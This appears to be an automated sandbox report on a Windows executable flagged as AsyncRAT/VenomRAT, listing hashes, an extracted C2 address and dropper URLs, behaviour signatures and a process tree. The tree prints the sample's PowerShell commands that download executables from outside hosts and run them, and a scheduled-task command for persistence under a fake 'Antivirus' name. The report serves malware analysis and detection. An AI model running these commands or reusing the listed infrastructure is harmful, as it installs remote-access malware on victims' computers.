Overview

overview

10

Static

static

10

a774be49a5...4e.exe

windows7-x64

10

a774be49a5...4e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-08-2024 18:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a774be49a50d0289a4d51679c1b75f736e8128c65451fcde9dc44812b9bf594e.exe

  • Size

    75KB

  • MD5

    2435ef2414fcf616da97999a95ec4bd8

  • SHA1

    e2429b1a2b0aca9340a97d80d5ad7a311467f161

  • SHA256

    a774be49a50d0289a4d51679c1b75f736e8128c65451fcde9dc44812b9bf594e

  • SHA512

    99a606205c9ee2a1b2095df27afb53a3a392eba43e525bd6abc1fedeffb3e64eca1608c478b1fbfd1d75f7a65a1ec201edac8c9be4845fbb7dec348613898c25

  • SSDEEP

    1536:0ukULWEVCuPPMRkUKt2OlY6H1bf/i/f7kzkuLVclN:0XUyWHPMRkUv4jH1bfMf7k/BY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

94.156.66.48:4449

Mutex

Antivirus

Attributes
  • delay

    1

  • install

    true

  • install_file

    Antivirus.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 2 IoCs

    Detects VenomRAT.

    rat
  • Async RAT payload 1 IoCs
    rat
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\a774be49a50d0289a4d51679c1b75f736e8128c65451fcde9dc44812b9bf594e.exe
    "C:\Users\Admin\AppData\Local\Temp\a774be49a50d0289a4d51679c1b75f736e8128c65451fcde9dc44812b9bf594e.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1628
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Antivirus" /tr '"C:\Users\Admin\AppData\Roaming\Antivirus.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Antivirus" /tr '"C:\Users\Admin\AppData\Roaming\Antivirus.exe"'
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6CAF.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1044
      • C:\Users\Admin\AppData\Roaming\Antivirus.exe
        "C:\Users\Admin\AppData\Roaming\Antivirus.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4884
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3952
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4372,i,3861745594156495651,17595114179815238301,262144 --variations-seed-version --mojo-platform-channel-handle=3696 /prefetch:8
    1⤵
      PID:3024

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      7cf51fd9a798b70dcc75418df6ab7709

      SHA1

      36565372f526bae197a5d1117032228ebd35b637

      SHA256

      cabd168d058cc355f41ccc602554ae350212e9bd79ff19e2ee0da1b6268155a4

      SHA512

      b78f414a2a45acde1a705e2731aba09f469fca36cfd171c11334f03f08ef60af3a33d2c907959017e4ec4777cea716b96d931ad36ecc809c81308cee7bb9a37e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      aa8efa56e1e40374bbd21e0e469dceb7

      SHA1

      33a592799d4898c6efdd29e132f2f76ec51dbc08

      SHA256

      25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

      SHA512

      ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      00ee428eb5e9bd49f2083fef5377ab99

      SHA1

      6e28a1d3d63a766e1cbb44e041c1db6461871e7e

      SHA256

      3702f0ddca7524097b51ad3efe7a50be52ce1ba8e136fe8325e7a16df6e37a4d

      SHA512

      1b97d0eca985b4edf64b6b20079eacf6f9f6b51ecd13e6ad1d04cfe34a7ab3ddb22f2eeef51581fed7095159694878c272dbc39287d597dafa973c12188769ed

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      cf989d8b59ce7eb32775f651bfe5887c

      SHA1

      790b46aba93b4571facca9d3b6dc4d07ad0a53b2

      SHA256

      7b229a233c8625cd83ca18f6853abfb05f32a1b31455fcd2cb90005a4575490c

      SHA512

      782b93a7173805ad42caa07ca2bfcd3c3ced136a04554765189e7bdde0518b29b29eb33446327f22f6d370030f10e08a54687557944ddeec0c223a2623e220f7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      378acab19fb77608f7e263a01273c890

      SHA1

      ba12b8abcde4107ed08ec4d462e9efb28c354d35

      SHA256

      2fcb5901af0cff90572c91d8de7c24a0bd43803c53e89b5f724cb91f85a02c77

      SHA512

      0a106ce65b9559be21425663922458509f02bd7d654a9e023fa6d1fa681f9be546b54f3b8aa3c6e00e1f1cc6b7b1712fd26eebd8358c4ef953ed812ac1dd5762

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      cde6866085a4fbf7d683b18d7c3714c3

      SHA1

      ea9431fff4b162fce02790b3bcbc4c8e55ab717a

      SHA256

      bf21bc0dfa6d33d77c3301c71e9904ade1c7b4a9707fd34cffa7937d7562dfe1

      SHA512

      e3d5ed1c5b71ca63b1633f6daa0c1dfa419639f10aca427408b96f9afa3728a5028c5e2cebca5f9ea21ea929d0ea37378a5bedffa436a9491d99e80fb695687e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      ecab7dac965a4a0f934b2aecf579cac4

      SHA1

      d580101b2b4147472a6734e6c47885c0f85b0bdc

      SHA256

      e29a3b2b86e399b8873c9414d39376ab14f69ff452371c0d27c2e7947a6fc03e

      SHA512

      72688f0cab81c8812680c5ea3a60d5a1dcff1b701bc9c69ba8529a06049fdfafce0d6d32e77b39c4bbca824279e59e158d592035ad9ee8f17ae9c207fd357817

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgjhjel3.wr1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp6CAF.tmp.bat
      Filesize

      153B

      MD5

      aff53d7b00eeb9db1bab4a763a8e8ea3

      SHA1

      db72b1953e1f65d827b05ff7a846380c2d52a6a7

      SHA256

      11d3a8490ffdadffaba35cd986f033d4b67657addc5230a7ea6379d182b89167

      SHA512

      1b726f96452e09e956222fab726234400fe3c3bc243d521dc22a0b902455f62d907dba3090554d4df042de58098a9f2f491ff61316a4428b93fb7440ea9ec416

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Antivirus.exe
      Filesize

      75KB

      MD5

      2435ef2414fcf616da97999a95ec4bd8

      SHA1

      e2429b1a2b0aca9340a97d80d5ad7a311467f161

      SHA256

      a774be49a50d0289a4d51679c1b75f736e8128c65451fcde9dc44812b9bf594e

      SHA512

      99a606205c9ee2a1b2095df27afb53a3a392eba43e525bd6abc1fedeffb3e64eca1608c478b1fbfd1d75f7a65a1ec201edac8c9be4845fbb7dec348613898c25

      Download Submit

    • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
      Filesize

      8B

      MD5

      cf759e4c5f14fe3eec41b87ed756cea8

      SHA1

      c27c796bb3c2fac929359563676f4ba1ffada1f5

      SHA256

      c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

      SHA512

      c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

      Download Submit

    • memory/1336-19-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1336-16-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1336-15-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1336-14-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1336-4-0x0000023866690000-0x00000238666B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1608-26-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1608-1-0x0000000000520000-0x0000000000538000-memory.dmp

      Filesize

      96KB

      Download

    • memory/1608-3-0x00007FFD01A50000-0x00007FFD02511000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1608-0-0x00007FFD01A53000-0x00007FFD01A55000-memory.dmp

      Filesize

      8KB

      Download